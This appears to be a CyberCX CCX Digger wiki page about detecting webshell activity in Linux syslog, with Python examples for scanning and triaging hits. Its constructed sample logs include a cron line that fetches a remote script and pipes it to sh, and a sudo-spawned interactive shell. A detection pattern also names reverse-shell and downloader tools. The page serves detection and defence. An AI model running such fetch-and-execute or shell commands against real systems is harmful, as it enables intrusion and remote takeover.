Linux Logs [0.1]
Suspicious log entries have been found which may suggest web shell activity or attempted access from known malicious origins.
This search aims to identify any activity within syslog files which may be indicative of webshell activity on the web server, or of specific known attackers having attempted to connect to the web server.
A webshell is a malicious script or page injected by an attacker onto a web server, which is then used to remotely access the server and launch further attacks.
This scan parses syslog files for suspicious entries which may be indicative of attacker activity, including specific commands which are characteristic of a webshell. Many webshell variants exist, but they can typically be characterised by being uploaded to a web server with the intent of gaining remote access in order to establish, escalate or maintain persistence on the system.
This search looks for any log entries which may suggest the presence of web shells, as identified within advisory 2020-008, using intelligence provided by the ACSC and by investigations performed by CyberCX and CrowdStrike, among other sources. See the threat intelligence sources section below for further details.
Hits are derived from the intelligence provided, and do not consider environmental factors specific to your computer or network environment.
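The following is an added example of the kind of syslog parsing described above; it is not CCX Digger's own code and does not use its rule set. It runs three simple rules over a constructed syslog excerpt: the web server account (`www-data`, `apache`, ...) escalating through `sudo`, a cron job running as the web server account, and any entry mentioning an address on an indicator list. The indicator list and the log lines are constructed for the example (TEST-NET addresses, not indicators from ACSC 2020-008), and the command patterns are an illustrative choice, not the pack's.

```python
import re

# Traditional BSD syslog layout: "Mon DD HH:MM:SS host tag[pid]: message".
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<tag>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)

# Accounts a web server normally runs as; commands spawned as these users are unusual.
WEB_USERS = {"www-data", "apache", "nginx", "httpd", "http"}

# Commands an operator typically runs through a freshly dropped webshell: recon,
# downloaders, interpreters and reverse-shell idioms (illustrative list, assumed here).
SUSPICIOUS_CMDS = re.compile(
    r"(?<!\w)(whoami|id|uname|wget|curl|nc|ncat|netcat|python3?|perl|base64)(?!\w)"
    r"|bash -i|/dev/tcp/"
)

# Constructed indicator list for this example: documentation (TEST-NET) addresses,
# not indicators taken from ACSC 2020-008 or any other advisory.
KNOWN_BAD_IPS = {"203.0.113.45", "198.51.100.7"}

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
SUDO_RE = re.compile(r"^\s*(?P<user>\S+) : .*COMMAND=(?P<cmd>.*)$")
CRON_RE = re.compile(r"^\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")

# Constructed sample syslog excerpt (not from a real system).
SAMPLE_LOG = """\
Jun 12 09:14:02 web01 sshd[2214]: Accepted password for deploy from 10.0.0.15 port 50122 ssh2
Jun 12 09:14:02 web01 sshd[2214]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Jun 12 09:20:41 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/apt-get update
Jun 12 11:03:17 web01 sudo: www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/bash -i
Jun 12 11:03:17 web01 sudo: pam_unix(sudo:session): session opened for user root by (uid=33)
Jun 12 11:05:58 web01 CRON[3410]: (www-data) CMD (curl -s http://198.51.100.7/x.sh | sh)
Jun 12 11:07:02 web01 sshd[3477]: Failed password for root from 203.0.113.45 port 41022 ssh2
Jun 12 11:07:09 web01 sshd[3477]: Accepted publickey for root from 203.0.113.45 port 41022 ssh2
Jun 12 11:30:00 web01 CRON[3600]: (root) CMD (/usr/bin/logrotate /etc/logrotate.conf)
"""


def parse(line):
    """Split one syslog line into its fields, or return None if it is not syslog-shaped."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines, bad_ips=KNOWN_BAD_IPS):
    """Return one hit per line that trips at least one rule; a hit records the
    1-based line number, the rules that fired, and the extracted user/command/IPs."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None:
            continue
        tag, msg = rec["tag"].strip(), rec["msg"]
        hit = {"line": n, "rules": [], "raw": line}

        # Rule 1: the web server account gaining privileges through sudo.
        m = SUDO_RE.match(msg) if tag == "sudo" else None
        if m and m["user"] in WEB_USERS:
            hit["rules"].append("web_user_sudo")
            hit["user"], hit["command"] = m["user"], m["cmd"]

        # Rule 2: a cron job running as the web server account (common for persistence).
        m = CRON_RE.match(msg) if tag == "CRON" else None
        if m and m["user"] in WEB_USERS:
            hit["rules"].append("web_user_cron")
            hit["user"], hit["command"] = m["user"], m["cmd"]

        # Rule 3: any entry mentioning an address on the indicator list.
        bad = sorted(ip for ip in IP_RE.findall(line) if ip in bad_ips)
        if bad:
            hit["rules"].append("known_bad_origin")
            hit["ips"] = bad

        if "command" in hit:
            hit["suspicious_command"] = bool(SUSPICIOUS_CMDS.search(hit["command"]))
        if hit["rules"]:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f"line {h['line']:>3} {','.join(h['rules']):<32} {h['raw']}")
```

Rules 1 and 2 fire on the account rather than the command text, because a webshell that runs `sudo` or installs a cron entry does so as the web server user regardless of which command it chooses; the command pattern is only attached as extra context for the analyst. Rule 3 matches an address anywhere in the line, so a download from an indicator address inside a cron command is caught as well as an SSH login from it.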
Packs.CyberCX.Linux.Logs
- Those provided in the ACSC advisory 2020-008 on ‘Copy and Paste’ attacks, which is marked Traffic Light Protocol (TLP) White.
- Investigations performed by CyberCX
- Investigations performed by CrowdStrike
- Contributions from the community
Any hits identified may not indicate compromise of your system, but might be indicative of attacker activity. It is recommended to review each detection in context to confirm whether the hit is definitively malicious or a false positive. Guidance on how to approach these investigations is provided within this section.
This section provides general guidance on how to determine whether a hit is indicative of malicious activity. Please note the specific detection results within the report generated by CCX Digger when conducting the investigation, as some of the content below may not be applicable to your system.
The entries identified should be investigated further to confirm the origin and context of the event. The following should be performed:
- Confirm that the behaviour is expected for the user's role and intended functionality, should a username be present
If the event was unexpected, or its origin unknown, further action should be taken to determine what was performed.
The following activities should be performed to determine if an attack may have occurred:
- Check to see if the event was successful.
- Identify any information that may have been returned, and investigate what that may relate to. This could include specific host details, user accounts, or directories.
- Conduct further investigation on the activity based on the command issued, or the connecting IP address, to determine if either are connected to any particular attacks, vulnerabilities, or attack groups.
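The three steps above can be partly automated from the log alone. The following is an added example (not CCX Digger's code) that, for one hit, decides whether the event succeeded (an `sshd` line states it directly; a `sudo` command line is treated as successful when a `session opened` line for the same host follows within a few seconds; cron only logs the dispatch), collects the surrounding lines, and summarises every appearance of each IP address on the hit line across the whole log (time span, accepted and failed logins, accounts targeted) so the address can be taken on to external correlation. The sample log is constructed; the success heuristics and the five-second window are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Traditional BSD syslog layout: "Mon DD HH:MM:SS host tag[pid]: message".
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<tag>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
AUTH_RE = re.compile(r"^(Accepted|Failed) \S+ for (?:invalid user )?(\S+) from (\S+)")

# Constructed sample syslog excerpt (not from a real system).
SAMPLE_LOG = """\
Jun 12 09:14:02 web01 sshd[2214]: Accepted password for deploy from 10.0.0.15 port 50122 ssh2
Jun 12 09:14:02 web01 sshd[2214]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Jun 12 09:20:41 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/apt-get update
Jun 12 11:03:17 web01 sudo: www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/bash -i
Jun 12 11:03:17 web01 sudo: pam_unix(sudo:session): session opened for user root by (uid=33)
Jun 12 11:05:58 web01 CRON[3410]: (www-data) CMD (curl -s http://198.51.100.7/x.sh | sh)
Jun 12 11:07:02 web01 sshd[3477]: Failed password for root from 203.0.113.45 port 41022 ssh2
Jun 12 11:07:09 web01 sshd[3477]: Accepted publickey for root from 203.0.113.45 port 41022 ssh2
Jun 12 11:30:00 web01 CRON[3600]: (root) CMD (/usr/bin/logrotate /etc/logrotate.conf)
"""


def parse(line):
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def when(rec):
    """Syslog timestamps carry no year; parsing them all into the same (unspecified) year
    is fine for comparing neighbouring lines but would break across a year boundary."""
    return datetime.strptime(rec["ts"], "%b %d %H:%M:%S")


def outcome_of(lines, idx, window=timedelta(seconds=5)):
    """Step 1: did the event on lines[idx] succeed? Returns success/failure/dispatched/unknown."""
    rec = parse(lines[idx])
    tag, msg = rec["tag"].strip(), rec["msg"]
    if tag == "sshd":
        if msg.startswith("Accepted"):
            return "success"
        if msg.startswith("Failed"):
            return "failure"
    elif tag == "sudo":
        # sudo logs a refusal on the command line itself.
        if "command not allowed" in msg or "incorrect password" in msg:
            return "failure"
        if "COMMAND=" in msg:
            # Otherwise success is evidenced by a PAM session line shortly afterwards.
            t0 = when(rec)
            for nxt in lines[idx + 1:]:
                r = parse(nxt)
                if r is None or r["host"] != rec["host"] or r["tag"].strip() != "sudo":
                    continue
                if when(r) - t0 > window:
                    break
                if "session opened" in r["msg"]:
                    return "success"
    elif tag == "CRON" and "CMD (" in msg:
        return "dispatched"  # cron records that the job started, not how it ended
    return "unknown"


def ip_activity(lines, ip):
    """Step 3: summarise every appearance of `ip` in the log."""
    ip_re = re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])")
    summary = {"ip": ip, "first_seen": None, "last_seen": None,
               "accepted": 0, "failed": 0, "users": set(), "lines": []}
    for n, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None or not ip_re.search(line):
            continue
        summary["lines"].append(n)
        summary["first_seen"] = summary["first_seen"] or rec["ts"]
        summary["last_seen"] = rec["ts"]
        m = AUTH_RE.match(rec["msg"])
        if m:
            summary["accepted" if m[1] == "Accepted" else "failed"] += 1
            summary["users"].add(m[2])
    summary["users"] = sorted(summary["users"])
    return summary


def triage(lines, hit_line, context=2):
    """Build the investigation record for one hit (1-based line number)."""
    idx = hit_line - 1
    rec = parse(lines[idx])
    report = {
        "line": hit_line,
        "host": rec["host"],
        "outcome": outcome_of(lines, idx),
        # Step 2: neighbouring lines show what was returned or what happened next.
        "context": lines[max(0, idx - context): idx + context + 1],
    }
    m = re.search(r"COMMAND=(.*)$|CMD \((.*)\)$", rec["msg"])
    if m:
        report["command"] = m[1] or m[2]
    report["origins"] = [ip_activity(lines, ip) for ip in IP_RE.findall(lines[idx])]
    return report


if __name__ == "__main__":
    for hit in (4, 6, 7):
        print(triage(SAMPLE_LOG.splitlines(), hit))
```

The `sudo` check deliberately reports `unknown` rather than `failure` when no session line is found within the window: the PAM line can be missing for reasons unrelated to the event (separate log file, rate limiting, rotation), so its absence is a prompt to look elsewhere, not evidence that the command did not run.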
If you have followed the investigations to confirm the validity of the findings, and believe your system may be at risk, please visit the Need Help? page for further instructions. Please refer to the same page for further context on how to use this wiki.
[v0.1]: